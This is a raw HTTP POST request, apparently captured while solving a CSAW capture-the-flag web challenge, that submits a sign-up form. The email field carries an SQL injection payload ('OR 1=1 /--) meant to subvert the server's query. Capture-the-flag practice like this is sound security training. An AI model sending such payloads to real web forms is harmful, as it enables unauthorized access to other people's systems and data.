POST / HTTP/1.1
Host: web.chal.csaw.io:5018
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 141
Origin: http://web.chal.csaw.io:5018
DNT: 1
Connection: close
Referer: http://web.chal.csaw.io:5018/
Cookie: session=eyJjc3JmX3Rva2VuIjoiYWY0NjdkYmUwNGU5ZTQxNmM1MjU2MmM1MzAxMmVmMmFhYzIwYTVkYiJ9.X1yVQg.lKl5drZLxEnsNEhcX7bynmEUmPs
Upgrade-Insecure-Requests: 1

csrf_token=ImFmNDY3ZGJlMDRlOWU0MTZjNTI1NjJjNTMwMTJlZjJhYWMyMGE1ZGIi.X1yVQg.h_zvAj5cMTl4R694bf6XWHXFpcw&email=%27OR+1%3D1+%2F--&submit=Sign+up
